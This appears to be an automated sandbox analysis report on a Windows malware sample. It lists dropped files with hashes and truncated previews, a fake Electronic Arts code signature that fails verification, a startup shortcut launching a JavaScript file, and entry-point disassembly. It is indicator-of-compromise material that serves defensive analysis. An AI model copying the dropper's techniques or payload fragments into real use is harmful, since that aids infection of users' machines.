                                      Malicious:false
                                      Preview:W0BdWUhfW0BVWUJVZmNucWdZQl1kaWRxZ1tCXVJldmVud21GZXZpYWdzLmd4ZSozW0hdMzIqW0Jd
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):2.0
                                      Encrypted:false
                                      SSDEEP:3:On:On
                                      MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                      SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                      SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                      SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                      Malicious:false
                                      Preview:bhlo
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):2.0
                                      Encrypted:false
                                      SSDEEP:3:On:On
                                      MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                      SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                      SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                      SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                      Malicious:false
                                      Preview:bhlo
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):2.0
                                      Encrypted:false
                                      SSDEEP:3:On:On
                                      MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                      SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                      SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                      SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                      Malicious:false
                                      Preview:bhlo
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):2.0
                                      Encrypted:false
                                      SSDEEP:3:On:On
                                      MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                      SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                      SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                      SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                      Malicious:false
                                      Preview:bhlo
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with very long lines (65536), with no line terminators
                                      Category:dropped
                                      Size (bytes):1813320
                                      Entropy (8bit):5.7074044081208415
                                      Encrypted:false
                                      SSDEEP:24576:WZZeX7tl1xw6JW3VrIS9GswjQGmToAnPDRPyccc9ntn5fS/Z76hMAX:ueDf0G875qqtnvWg
                                      MD5:2EAAE68CA44390605379C1973A83C343
                                      SHA1:4CE10B0C2717A631A53ACA5E9DAA7B0BF823C2E6
                                      SHA-256:1C8097E10CD7B6189A5E13E3B730E5E859675604EB8C459D7F7314D434CB9D8D
                                      SHA-512:CF365B466C2D8073B9DF3495428A8E0183BEC2D623372D4CFDFE58144E91B972C725B2C3430BC0D904D7CDD5E21C13F32AF9B2148E6ED5DA2EE9FF25994EA929
                                      Malicious:false
                                      Preview:VUVzRkpAUUFJQ0NBQUBqbkpHd096MVI3YVRHQkFBQkFBZUlLQUFBQ0wzcDZZUzVpYk96cS1ROTZGTFpUQUM1UlpDZkhjQXpzUWpYUUpVc21zOltHTGpCUEd6ZG9CcktiZ0VyW2tHUUZTZ0p2SlkwcmJfbVtBYWdpQmhbYE1waU1ZbCsyI3ZaU25VdmoyO0lVdnZYR1EjOHcyV3VpQ3VGUEZbXzFSa1dmZlVNTGdoQXVNfDg3Oys3b0w7bS03KS0xUGMvMVhAOFA6WG89LykpNzc3Nzd4emZsbHV3NWF4dG40RmBNZ0Q5Zjc3Z01qdjF4Y34vOmw1bmx1QW5admhBRGUzYlFpNU02I0dVfnpRc3R0VWZkenx6NDUzNHovbXZmenRiRTE3N3hsZTlJR1Y5ZG5eRXRkeWZobnc7aUZBNnd5L2owbCk5ZW5hUmN5UW8wVUBuMTExaWZMeGVmVG92Ly9mejo0N1RwNkZtUzl0OXIxMVBsRjlPKVNyKVJwTzBFNTVQQX5wUWJpZnJ8YVZPdXRkQ3FWXyc7NG4pbjFjTHo1bWtmYWJQbTIwVFZSMUopUUZNZG9QMEtmUTQ3NXp3M1dNOFoxYW5yPHBqTmZASDE2NG9mTkF9SjtYRzN6RXFGTU09VDZQQU5OT3lMbCtIZmpCRTpAUVY7VDBAdTVOa1BKeGNhS1d5Z34wYD5mKVZISnFHWkFscjtXRlFoSllIellvSnhBdGM1bFp2Njc4a0d6eHpFLWZ2LW9IMVJmR2wyRGRMc0xQSThYMTJkMWstcXN4QzJWWWpKcGJzaC91NnZTVCdoT0VkZ3BPKzF3Yk9aWn9sRWFNZDdBMnRFUGBpU015YXVyc2NrYkc6UHZFSmZAcnNTVHpdMG5zNjRMbDBDcEl8ZFYvOExwR280Z3cxbGhtZVdBZVU3YjRqZHZnYzVrTEQ2XWVZcj9oSDxYaE9qMVZ4dS0nI1Itb3RRbjJ0MjhmcFZ6WFVIWHFYQ1RB
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):2.0
                                      Encrypted:false
                                      SSDEEP:3:On:On
                                      MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                      SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                      SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                      SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                      Malicious:false
                                      Preview:bhlo
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):2.0
                                      Encrypted:false
                                      SSDEEP:3:On:On
                                      MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                      SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                      SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                      SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                      Malicious:false
                                      Preview:bhlo
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):2.0
                                      Encrypted:false
                                      SSDEEP:3:On:On
                                      MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                      SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                      SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                      SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                      Malicious:false
                                      Preview:bhlo
                                      Process:C:\Windows\SysWOW64\curl.exe
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):4
                                      Entropy (8bit):2.0
                                      Encrypted:false
                                      SSDEEP:3:On:On
                                      MD5:C00C81FEDEF0B80B43CC1DB8DE50C00C
                                      SHA1:1AC21B1D5ACCB55CFA0ABBBCF57F836AADA49EE2
                                      SHA-256:A23C9F5563AD1C2019C59DDE6EB4FA3442C0B5BBF83A279854A3EE3987C51E7B
                                      SHA-512:869551F28FFE1BB9BA906EAA94D9C54FD2197215510DBF5A4F053F71A45C189A570F27920AC3688862E21043854319718B6E028D25A4E453FAAD9770EDE9C6D2
                                      Malicious:false
                                      Preview:bhlo
                                      Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):256512
                                      Entropy (8bit):6.608077688435287
                                      Encrypted:false
                                      SSDEEP:3072:8xDDNhSGkz5e5cfll2+NkqXGJFGOm26C2zIvr1FnYzyrnJEYAAAAA+hIefckRQEH:R6Wl20LA4OBrn+NedRO7xn3T
                                      MD5:4CA574943165D792EFADFFFF193A5395
                                      SHA1:282C147DD34EC7BB7D5631EA25C69B656B3F1D62
                                      SHA-256:7F1E0EA1984AACAEE736F3082560D53F3E990B44D6E5D2B9ED38A148DE79A0FB
                                      SHA-512:5862E41F3FFA0EFCCFB040A878C6EF9E7E00BF8A153EB8AF1031FCC047179A8D744EAFC3232C64FCAD8E43664EBA40670A9E37DC34C0BD2FA033EABDEBD5F61A
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........<U}.];..];..];.:A5..];..B0..];..B1..];..B?..];.7Ud..];..]:..];.:Uf..];..{0..];......];......];.~[=..];.F}?..];.Rich.];.........................PE..L...,.Y...........!.....J..........W5.......`...............................p.........................................z...L...d.... .......................@..4....................................................`...............................text....I.......J.................. ..`.rdata..JY...`...Z...N..............@..@.data....K..........................@....sxdata.............................@....rsrc........ ......................@..@.reloc...$...@...&..................@..B................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):690688
                                      Entropy (8bit):6.581619840895496
                                      Encrypted:false
                                      SSDEEP:12288:rmJysC11szmzqS/Vf3gny3MhcGsnWrfATfkeafIO3rn1ExwnZE1f:r9s/zmT/my8zoW6ff4rn1ExwZE
                                      MD5:0184E6EBE133EF41A8CC6EF98A263712
                                      SHA1:CB9F603E061AEF833A2DB501AA8BA6BA007D768E
                                      SHA-256:DD6D7AF00EF4CA89A319A230CDD094275C3A1D365807FE5B34133324BDAA0229
                                      SHA-512:6FEC04E7369858970063E94358AEC7FE872886B5EA440B4A11713B08511BA3EBE8F3D9312E32883B38BAE66E42BC8E208E11678C383A5AD0F7CC0ABE29C3A8ED
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........,"..Bq..Bq..Bq..Nq.Bq..Iq.BqB.Lq.Bq..Hq.Bq..Fq.BqO..q..Bq..CqN.BqB..q.Bq..Iqy.Bq...q.Bq...q.Bq..Dq..BqRich..Bq........................PE..L...+.Y........../......8...................P....@..........................@..............................................,...x....0..@............................................................................P..(............................text....7.......8.................. ..`.rdata...@...P...B...<..............@..@.data....r...........~..............@....sxdata...... ......................@....rsrc...@....0......................@..@........................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):147456
                                      Entropy (8bit):6.544226860164606
                                      Encrypted:false
                                      SSDEEP:3072:TYpNRok2PQFDTQQYvanxOokAAAAA+cQKiG3iral6W60b:ahFDTQdZG3zUW6
                                      MD5:4D183847804E733FB6A197E24272E870
                                      SHA1:11A11DEEE65803C75FFFB496F91494E6E1E4B7FC
                                      SHA-256:7F964A73D3BD666A494B6EB82AA984BC0B4E77172A78AA4BE786D9A578103224
                                      SHA-512:F60B02A16735BCD474838CA8854A1368A7EA157BA72A86823D5B3E1DD13EC26A9A92C458B5C554ED3DAFA594BF1F66BD9D42ABB70A6C097C076CEC1AD76BB1B5
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......jm.@................)...A...-...A...*...A...,......./...............)....*..h...5.;.!...5...,......./....,../...Rich............................PE..L.../.Y...........!....................................................................................................{...D...P....................................................................................................................text............................... ..`.rdata..;9.......:..................@..@.data....J... ......................@....sxdata......p......................@....rsrc...............................@..@.reloc..H............&..............@..B................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\768032\Finish.com
                                      File Type:ASCII text, with no line terminators
                                      Category:dropped
                                      Size (bytes):135
                                      Entropy (8bit):4.981570876728718
                                      Encrypted:false
                                      SSDEEP:3:Bwc5kVcWXXp18YL8sPS3GArKM5mRPUkh4E2J5xAIMGe4QdvvTA:OceuWXXQmvS3GArX5kP923ffe4GXTA
                                      MD5:A8C4BB76AA94DF0DF1ACC2E80931E9B4
                                      SHA1:2ED96C936A560043AEE7AA9A9D588262CDE412E6
                                      SHA-256:DE0028991BB5763CDB175C92C6E8795AB9E761DE3506F5936D2601667627FDB4
                                      SHA-512:C91BF919D1BA3A86287B86EBA7D3BB3355729579FACB97E0C79F4AFBD35003FE1135AABA081688CB333D2BFF5B85F64ECC46A4E6EFBF1B895ABD5353A2964584
                                      Malicious:false
                                      Preview:4CA966315CCC70F4BEF0FE322EDE46*user*066656*true*false*0*0*void*void*C:\Users\user\AppData\Local\Temp\768032\Finish.com*false*1*void
                                      Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):313496
                                      Entropy (8bit):6.329253795498564
                                      Encrypted:false
                                      SSDEEP:3072:wGicIgBsA+8vctYpleMKZUFEd0iVcxWHYGsDJXU+l9koZUFvEjqcVtb5BR+pEz2D:rl0eXEdB4FdjSvYqWdM4hM
                                      MD5:624ADB0F45CBB9CADAD83C264DF98891
                                      SHA1:E839CE1E0446D8DA889935F411F0FB7AD54D4B3E
                                      SHA-256:8F401DC021E20FF3ABC64A2D346EF6A792A5643CA04FFD1F297E417532ACAA06
                                      SHA-512:B29B3A72CD32EE34EC6CE357818658B8A89C399E2F8439A7F49FB1A506ED912F41AFA19BC5C142C9A4539ACC5966A29C6A6637C23DE0DC3E5F2D85264620BDBA
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........p.Eq..Eq..Eq..H#..Tq..H#...q..H#..bq..L...Dq..L...Pq..Eq...q..8...Fq..8...Fq..H#..Dq..Eq..Dq..8...Dq..RichEq..........PE..L...Kp{W.........................................@..........................P.............................................0........`...................>..............................................@...............D...l...`....................text............................... ..`.rdata..............................@..@.data...............................@....rsrc........`......................@..@........................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                      File Type:PE32+ executable (console) x86-64, for MS Windows
                                      Category:dropped
                                      Size (bytes):351904
                                      Entropy (8bit):6.077576126824556
                                      Encrypted:false
                                      SSDEEP:6144:0aNJZh5a45XRueuTI52O17cNq7tncFSsTTB8YS6SBjyxgg4Lf4fC:0aFi45z2ancFn/0jlJ
                                      MD5:EFA2F8F73B3559711149DFDEB8BC288E
                                      SHA1:453C70E4B12ECABE860866165AD39DE6361215FD
                                      SHA-256:EF5CF80C8448BF0907C634A3251CC348B1D36BB5AD8F31F23B11D12AA7F63BCB
                                      SHA-512:63F75A3D639A912E2E3966E9D410F8E1C52B75300518BB5083853EF2633C7E109C037EA2B66CED57BD5B319866A14BCD92254CB38AB9EC7B99465B0A8A8F5F3E
                                      Malicious:true
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........~...~...~.../S..~.../l..~.../R..~....4..~.... ..~...~..!~....S..~....R..~...,h..~...~$..~....m..~..Rich.~..........................PE..d....o{W..........#.................p..........@.......................................... .................................................h........................ ...>..............................................p.......................`....................text.............................. ..`.rdata...-..........................@..@.data...@...........................@....pdata..............................@..@.rsrc............ ..................@..@................................................................................................................................................................................................................................................................................
                                      Process:C:\Users\user\AppData\Local\Temp\768032\Finish.com
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):167936
                                      Entropy (8bit):6.1797557233483955
                                      Encrypted:false
                                      SSDEEP:3072:IeAGcNNwmlR2GNUbomMYMLnbtoKOmiNL2SJOUOhop:CvNNtWuYcqHmiNLOc
                                      MD5:75375C22C72F1BEB76BEA39C22A1ED68
                                      SHA1:E1652B058195DB3F5F754B7AB430652AE04A50B8
                                      SHA-256:8D9B5190AACE52A1DB1AC73A65EE9999C329157C8E88F61A772433323D6B7A4A
                                      SHA-512:1B396E78E189185EEFB8C6058AA7E6DFE1B8F2DFF8BABFE4FFBEE93805467BF45760EEA6EFB8D9BB2040D0EAA56841D457B1976DCFE13ED67931ADE01419F55A
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........R.D.3...3...3...,...3...3...3.../...3.......3.../...3.......3..Rich.3..........................PE..L...P.#B............................xH............@.........................................................................07..P....................................................................................................................text............................... ..`.rdata...a.......p..................@..@.data....b...P...@...P..............@...........................................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:modified
                                      Size (bytes):53
                                      Entropy (8bit):3.5007143226894013
                                      Encrypted:false
                                      SSDEEP:3:XrEIuqujyM1K8vF:Xrhurj1hF
                                      MD5:C16330B5345B80BA27AF8BFD4299904E
                                      SHA1:9F573E303431E956395DC09C510C445AE55EF7D7
                                      SHA-256:D6306F25B6B4CF4D6A82A4BBB691932AD74730EC3D9A4C2D5EC90B1574D4BAFE
                                      SHA-512:173F20932FAF91348AE1B26BC99DFFD4B438B6868921E5B5352FB1B513382203E49643DD2129B7365D570159DADF108440141D4D77193C1C6108A2140B9CE3F6
                                      Malicious:false
                                      Preview:OS Name: Microsoft Windows 10 Pro..
                                      Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows, UPX compressed
                                      Category:modified
                                      Size (bytes):44544
                                      Entropy (8bit):7.766110456396969
                                      Encrypted:false
                                      SSDEEP:768:UF24SNifq4YWc5uEvW7KrQaFzs4C9B18sEufqnYIG0y8XmEsYR2fWIrKiSU:UMNG9c5jfQ8XoB18FufVIG092lWAKiSU
                                      MD5:0E69B6BD18E064C83A11B48495C1B01E
                                      SHA1:21C4CC08D3600C564BD0D04C8553E59F564BFFF4
                                      SHA-256:67E0D635825CBF7CC213670F671544DA9FF18047742DD4A0696A508B79EEF607
                                      SHA-512:E7C9B9209359183ADE3502AD9C8807B7948D38FD0EF883655DECEF2E5F212BE646A0E3FD93B51988595511B979C669DEE8F9F2A3BA90A4B0CECF0423FF2D3F51
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                      • Antivirus: ReversingLabs, Detection: 5%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........6...W...W...W..=X..W...t...W..$t...W...t...W..=X..W...W...V.....W......W......W..Rich.W..........................PE..L....'C].........................................@.................................................................................................................................................................................................UPX0....................................UPX1................................@....rsrc...............................@......................................................................................................................................................................................................................................................................................................................................................................................3.03.UPX!....
                                      Process:C:\Users\user\AppData\Local\Temp\768032\Finish.com
                                      File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                      Category:dropped
                                      Size (bytes):1019991
                                      Entropy (8bit):7.9981268397514125
                                      Encrypted:true
                                      SSDEEP:24576:I8QnhcAisyibvw8QJTTRz+oH7OgXwWpiubynw7ynLbzCQ:Itns7GY1XSsOQfE/7bzCQ
                                      MD5:9E73FB50D37E37EE8BD19A8E3D2B82CA
                                      SHA1:3DB1C548E86E4BB7457324A3097B05DA15B7FFC3
                                      SHA-256:68BA7122EE8D9CE34ED94B6036A171CE38D6D9D9B3A609C2F4DE773F4DD40D5C
                                      SHA-512:B41209300F018103B0F8A4DE0537F348A3BDFCBC8FEB19E7FEC6634B06C266CC442145FD2D9230F827F273B0D07BB6BBCAB7A0F0E9E1F558E6DD7A076F568094
                                      Malicious:true
                                      Preview:PK.........e.K...yq1...@......7zxa.dll...x......d'.,.b.X%j....5.Q.7.....l.d.B.m%.)mi...$.6.2..b_...R}k[....FK...l"..O...FE.uC...02.9.../.?...=..<.......{...k.g.8N.?]....sr.....)W.0.{v.k.:.E..*..g]....~..k.......J.__.Q/.'..d......w.^}...).X.u..7..N........Y...i.....J........i.mi30..*Mo.........i...D.GR~@.....}.....X......E|.w.,...q7.J.0.U...,....<..}O`p.'...L..f..........PT.%..b`s..;..............|I......<?}%./.06M......I_.8G^.....g.Fp.y.K.=..3&..$.O..a....V.6..8.]..._W...j:..g....9o._....R.+.2x^3!.<.......kv..S.u.f..L.m.......3....=....d.S....Q...~..........A..`...._f?.We.U6.H..D6...dk...4.Z....Q-...............a...^^...uTr...O:x'......uh.)..>"...f.S.l.Rb.}f.m..c.0%Yd...x.W...\....u..^....WZ..z......t+..{.....D....s.ne2....GN.qa.p..7.kD..5......v.C......~.k...f]6....P..%#.%.z.$E.!..>....#.. ......g..YH..7U.0..W.).S.........*.*..^"..([.g.)d....iWc...j.w'....F.'s...M."..={.{s<........}.3..s).|........\~.T..-k..V~....n......
                                      Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                      File Type:PE32 executable (console) Intel 80386, for MS Windows
                                      Category:dropped
                                      Size (bytes):135168
                                      Entropy (8bit):6.567755066270725
                                      Encrypted:false
                                      SSDEEP:3072:8yiIL2aUStYI4kOojhmlDUaKhVV4dD+mO3teRl:k2bukOkhK4aKhVV/
                                      MD5:83AF340778E7C353B9A2D2A788C3A13A
                                      SHA1:55C5A72010291FCA2275CCFB5B497DD0BAC11A60
                                      SHA-256:E9929598C98359773B7C51E3C4461D0F99B1703790FF775AEE3C63A9A9A74CA8
                                      SHA-512:FCC810D84BFE8876123757B5E7BBBB571D7FBF3B3068B81215BDECFD0742AC94EDEEF5589277A67C40693D1182676604BC0E2F2610421AC138C59750E1CFED86
                                      Malicious:false
                                      Antivirus:
                                      • Antivirus: ReversingLabs, Detection: 0%
                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......}.1.9._.9._.9._....;._.*.6.(._.<.?.;._.<.P./._.`.L.:._.9.^.W._.Z.u.;._.<...._.<...8._.Rich9._.................PE..L......D.....................P....................@.........................................................................8...<....................................................................................................................text...A........................... ..`.rdata...[.......`..................@..@.data...D...........................@...........................................................................................................................................................................................................................................................................................................................................................................................................
                                      Process:C:\Windows\SysWOW64\cmd.exe
                                      File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" >), ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):95
                                      Entropy (8bit):4.7820803208151075
                                      Encrypted:false
                                      SSDEEP:3:HRAbABGQaFyw3pYoUkh4E2J5sxELJSfy:HRYF5yjo923sqLcfy
                                      MD5:5E8D923D4B4B2FC77F024FD715072BFA
                                      SHA1:A97801909E10436749DF0E5CCF37310D761E7165
                                      SHA-256:53A5C332207B1E0556F1B123D6778F8B9A4DA66DA3B99C1235823D98DF1CE94E
                                      SHA-512:991088D786F1F14F93C9F3AD1D636BDF95829A5286C94B8C9F78AF3E5BF8724C9938BB089B3A2189E3F8F9D82E7B4AA81A1D0D2D11CA3BBE8325B0EA0383DF68
                                      Malicious:true
                                      Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.js" ..
                                      Process:C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe
                                      File Type:ASCII text, with CRLF line terminators
                                      Category:dropped
                                      Size (bytes):293
                                      Entropy (8bit):3.479129918610545
                                      Encrypted:false
                                      SSDEEP:6:esaSfLq2ANq2XCNq28gSNq2LwcNq2L+V0Nq2+BSNq2SWXLXS:6Szq20q2Xiq2TSq20Aq2eYq2QSq2/7S
                                      MD5:8FCA86EBFED803CF311D9FCC42835C2E
                                      SHA1:36B77381AD0DE20CD1BDFA45695954314CB3D19F
                                      SHA-256:0D11AA28844832C1BDEF3AA868FC514E72E92CF1B740AFC467AD5692A0A8BDC1
                                      SHA-512:078D144DC41383E933587BDB428702EFDD3D796118AE1559B84750207C8909BA5D554FF7321EFD3002439660ADA43CF7544370682B5150A7C597286751B3D529
                                      Malicious:false
                                      Preview:Archive: xhwq.zip.. inflating: 7zxa.dll .. inflating: 7za.dll .. inflating: 7za.exe .. inflating: PsInfo.exe .. inflating: PsInfo64.exe .. inflating: zip.exe .. inflating: nircmdc.exe ..
                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                      Entropy (8bit):7.971581603254859
                                      TrID:
                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                      • DOS Executable Generic (2002/1) 0.02%
                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                      File name:file.exe
                                      File size:1'245'183 bytes
                                      MD5:c938c02a19091a3acd044001631692c8
                                      SHA1:681e661b16ae2bebce2ef18facb86de6fd727cae
                                      SHA256:e090769b89bee3e8ab4a316355fab8da61f629b0eee9da37c0ac312bdc20aad8
                                      SHA512:96b27123ff6e7db9202d82557dfbf13d941741b7c96ce9e757cacd95c80e761fc750998712f2638c70e06768f802e92524b1f3d09c92f97230673d283b1766a1
                                      SSDEEP:24576:OYY2DPYW2HJbxcraPMB4/46ft6BM8I7oRCL7piz5nWXXCXk75Fh:d5DgWscOPe6ft61RRGwn4Xykh
                                      TLSH:95453345C2BC7C19CD830FF529714A455FB2B425012097932AA59E3EEEA0B06FBB8777
                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8.....
                                      Icon Hash:e1e0e4e8c0e0f0e0
                                      Entrypoint:0x4038af
                                      Entrypoint Section:.text
                                      Digitally signed:true
                                      Imagebase:0x400000
                                      Subsystem:windows gui
                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                      Time Stamp:0x4F47E2E4 [Fri Feb 24 19:20:04 2012 UTC]
                                      TLS Callbacks:
                                      CLR (.Net) Version:
                                      OS Version Major:5
                                      OS Version Minor:0
                                      File Version Major:5
                                      File Version Minor:0
                                      Subsystem Version Major:5
                                      Subsystem Version Minor:0
                                      Import Hash:be41bf7b8cc010b614bd36bbca606973
                                      Signature Valid:false
                                      Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                      Signature Validation Error:The digital signature of the object did not verify
                                      Error Number:-2146869232
                                      Not Before, Not After
                                      • 04/05/2023 02:00:00 07/05/2026 01:59:59
                                      Subject Chain
                                      • CN="Electronic Arts, Inc.", OU=EAC, O="Electronic Arts, Inc.", L=Redwood City, S=CALIFORNIA, C=US
                                      Version:3
                                      Thumbprint MD5:33BD4710688F5874BAC612E52BCCEEA8
                                      Thumbprint SHA-1:A46E87AEBD8693AE8B3B2F26449F8828368B4D4F
                                      Thumbprint SHA-256:0F952F3F6AF7C5B1FE753761AD34E2C360930EF530EB6A753AB461046F79C049
                                      Serial:0671352DC4C103B70AE725E954486374
                                      Instruction
                                      sub esp, 000002D4h
                                      push ebx
                                      push ebp
                                      push esi
                                      push edi
                                      push 00000020h
                                      xor ebp, ebp
                                      pop esi
                                      mov dword ptr [esp+18h], ebp
                                      mov dword ptr [esp+10h], 0040A268h
                                      mov dword ptr [esp+14h], ebp
                                      call dword ptr [00409030h]
                                      push 00008001h
                                      call dword ptr [004090B4h]
                                      push ebp
                                      call dword ptr [004092C0h]
                                      push 00000008h
                                      mov dword ptr [0047EB98h], eax
                                      call 00007F7274F8F12Bh
                                      push ebp
                                      push 000002B4h
                                      mov dword ptr [0047EAB0h], eax
                                      lea eax, dword ptr [esp+38h]
                                      push eax
                                      push ebp
                                      push 0040A264h
                                      call dword ptr [00409184h]
                                      push 0040A24Ch
                                      push 00476AA0h
                                      call 00007F7274F8EE0Dh
                                      call dword ptr [004090B0h]
                                      push eax
                                      mov edi, 004CF0A0h
                                      push edi
                                      call 00007F7274F8EDFBh
                                      push ebp
                                      call dword ptr [00409134h]
                                      cmp word ptr [004CF0A0h], 0022h
                                      mov dword ptr [0047EAB8h], eax
                                      mov eax, edi
                                      jne 00007F7274F8C6FAh
                                      push 00000022h
                                      pop esi
                                      mov eax, 004CF0A2h
                                      push esi
                                      push eax
                                      call 00007F7274F8EAD1h
                                      push eax
                                      call dword ptr [00409260h]
                                      mov esi, eax
